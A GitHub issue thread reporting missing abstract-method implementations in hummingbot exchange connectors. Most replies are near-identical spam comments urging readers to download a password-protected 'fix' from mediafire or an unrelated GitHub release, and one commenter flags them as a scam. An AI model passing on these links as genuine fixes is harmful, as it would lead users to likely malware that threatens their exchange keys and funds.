### ISSUE TITLE
Connectors with order book failures

### ISSUE THREAD

**Issue by MementoRC** [hummingbot/hummingbot#5875]
**Describe the bug**
The following modules are likely to generate an order book failure:
```
altmarkets/altmarkets_api_order_book_data_source.py
beaxy/beaxy_api_order_book_data_source.py
bitfinex/bitfinex_api_order_book_data_source.py
bitmart/bitmart_api_order_book_data_source.py
blocktane/blocktane_api_order_book_data_source.py
coinzoom/coinzoom_api_order_book_data_source.py
k2/k2_api_order_book_data_source.py
liquid/liquid_api_order_book_data_source.py
ndax/ndax_api_order_book_data_source.py
wazirx/wazirx_api_order_book_data_source.py
```

They are missing implementation for abstract methods in their base class

**Steps To Reproduce**
Start a strategy with these connector, await occurrence of HB `Not Implemented` error message

**Release version**
dev-1.10.0

*WARNING: Do NOT publish any exchange API keys or your wallet's private key. Whoever has access to them may steal your assets!*

**Optional: your discord username:**

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nikspz** [comment]
> to fix your trouble try download this fix, i see it in another issue,

This is scam

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
